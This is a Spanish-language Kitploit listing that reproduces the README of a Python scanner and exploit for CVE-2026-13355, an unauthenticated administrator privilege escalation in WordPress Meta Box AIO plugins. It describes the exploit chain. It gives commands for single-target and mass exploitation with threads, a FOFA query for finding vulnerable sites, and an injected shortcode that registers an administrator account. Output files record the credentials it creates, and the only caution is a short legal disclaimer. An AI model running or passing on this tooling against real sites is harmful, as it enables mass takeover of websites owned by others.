Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-13355 — Escáner PoC en Python y exploit para CVE-2026-13355, una escalada de privilegios de administrador no autenticada en los plugins de WordPress Meta Box AIO, con escaneo masivo FOFA. | Kitploit
Herramientas/GitHubGitHub/murrez/cve-2026-13355
Escalada de PrivilegiosReconocimientoEscáneres de VulnerabilidadesExplotaciónScripting y AutomatizaciónExplotación de Aplicaciones WebRecopilación de InformaciónSeguridad WebPruebas de Penetración
GitHubmurrez/cve-2026-13355

CVE-2026-13355

3hace 1 díaAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Escáner PoC en Python y exploit para CVE-2026-13355, una escalada de privilegios de administrador no autenticada en los plugins de WordPress Meta Box AIO, con escaneo masivo FOFA.

Ver Repositorio

CVE-2026-13355 — Escalada de privilegios a administrador sin autenticación en Meta Box AIO

Prueba de concepto en Python 3: escáner y exploit para CVE-2026-13355 en el paquete de WordPress Meta Box AIO (y las extensiones relacionadas MB Frontend Submission / MB User Profile).

PlataformaPlugin de WordPress
ComponenteMeta Box AIO
AfectadosMeta Box AIO ≤ 3.11.0; MB Frontend Submission ≤ 4.5.6; MB User Profile ≤ 3.11.0
Corregido enMeta Box AIO 3.12.0+ (autorización de Form::process())
CVSS9.8 Crítico
AutenticaciónSin autenticación
CWECWE-269 — Gestión inadecuada de privilegios
Investigadorh0xilo (Wordfence)

Resumen

Fallos encadenados en dos extensiones incluidas permiten la creación de cuentas de administrador sin autenticación:

  1. MB Frontend Submission (mbfs) — rwmb_frontend_field_object_id sobrescribe el objetivo del formulario sin autenticación; Form::process() omite user_can_edit(), por lo que los atacantes pueden usar wp_update_post() y sobrescribir post_content en entradas/páginas arbitrarias.
  2. MB User Profile (mbup) — Los atributos inyectados del shortcode [mb_user_profile_register role="administrator" auto_login="true"] se confían sin validación del rol.

Importante: La cadena de explotación requiere un formulario público de mbfs (envío desde el frontend), no formularios mbup de solo inicio de sesión. Muchos resultados de FOFA solo exponen la interfaz de inicio de sesión/registro de mbup — esos se marcan como plugin_mbup_only, no explotables mediante esta cadena.

Requisitos

  • Python 3.8+
  • pip install -r requirements.txt

Inicio rápido

root@kitploit:~
pip install -r requirements.txt

# Objetivo único — comprobar (flujo de terminal en vivo por defecto)
python poc.py -u https://target.example --mode check

# Comprobación masiva (una línea por objetivo salvo --quiet)
python poc.py --list targets.example.txt --mode check --threads 20

# Objetivo único — explotar (necesita URL del formulario mbfs + ID de entrada)
python poc.py -u https://target.example --mode exploit \
  --form-url /contact/ --object-id 12 --verify

# Explotación masiva desde la salida de comprobación
python poc.py --list candidates.jsonl --mode exploit --threads 5 --verify

FOFA → lista de objetivos

Consulta de ejemplo:

root@kitploit:~
body="/wp-content/plugins/meta-box-aio/"

Normalizar una exportación CSV de FOFA:

root@kitploit:~
python fofa_to_list.py -i fofa_export.csv
# escribe list.txt + CSV normalizado (solo local, en gitignore)
python poc.py --list list.txt --mode check --threads 20

Opciones de CLI

Archivos de salida

Usa --vuln-list exploited.txt en las ejecuciones de exploit para que los aciertos de comprobación en hits.txt no se sobrescriban.

Valores de status en la comprobación

Notas sobre la explotación

  • El paso de envenenamiento envía post_content mediante un formulario mbfs con ?rwmb_frontend_field_object_id=<id>.
  • El éxito requiere que el shortcode inyectado se renderice en la página envenenada (sin strip/KSES, plugin parcheado, tipo de formulario incorrecto).
  • Los formularios mbfs de contacto/boletín a menudo carecen de un campo post_content real; la sobrescritura puede fallar igualmente en la práctica.
  • Un HTTP 403 en el POST suele indicar bloqueo por WAF/host.

Estructura del repositorio

root@kitploit:~
.
├── poc.py
├── fofa_to_list.py
├── requirements.txt
├── targets.example.txt
├── README.md
├── LICENSE
└── .gitignore

Las listas de escaneo locales y los artefactos de ejecución (list.txt, fofa*.csv, *.jsonl, hits*.txt, …) están en .gitignore y no deben confirmarse.

Referencias

  • NVD — CVE-2026-13355
  • Aviso de Wordfence
  • Registro de cambios de Meta Box AIO

Legal

Solo para pruebas de seguridad autorizadas y educación. Eres responsable del cumplimiento de las leyes aplicables y las reglas del programa.

Descargar herramienta
OpciónDescripción
-u, --urlURL base única
--listLista de URLs, CSV normalizado de FOFA (columna url) o candidates.jsonl
--modecheck o exploit
--form-urlPágina con [mb_frontend_form ...] / mbfs-form
--object-idID de entrada/página para rwmb_frontend_field_object_id
--pathsRutas adicionales que rastrear en busca de formularios de frontend
--username, --email, --passwordCredenciales de registro (exploit)
--shortcodeCarga útil inyectada en post_content (shortcode de registro de admin por defecto)
--verifyConfirmar mediante /wp-admin/ o wp-login.php tras el registro
--flowTransmitir una línea por objetivo en ejecuciones masivas (por defecto con --list)
--no-flowSolo resumen de progreso
--quiet, -qSalida mínima en consola
--threads, -jConcurrencia masiva (por defecto 15)
--outputRegistro JSONL (por defecto cve_2026_13355_results.jsonl)
--vuln-listLíneas de aciertos/explotadas en texto (por defecto hits.txt / usar exploited.txt para exploit)
--candidates-listJSONL de metadatos de comprobación (por defecto candidates.jsonl)
ArchivoModoContenido
cve_2026_13355_results.jsonlambosJSON completo por objetivo
hits.txtcheckURLs con candidate_mbfs
candidates.jsonlcheckform_url, object_id, indicios de versión
exploited.txtexploiturl|user|email|pass|oid=…
EstadoSignificado
candidate_mbfsPlugin presente + formulario de MB Frontend Submission encontrado (la explotación puede ser posible)
plugin_mbup_onlySolo formularios de inicio de sesión/registro de User Profile — no es esta cadena de CVE
plugin_no_frontend_formsHuella del plugin, sin formularios de frontend rwmb descubiertos
patchedVersión por encima del rango afectado (cuando es legible)
no_pluginMeta Box AIO / extensiones no detectadas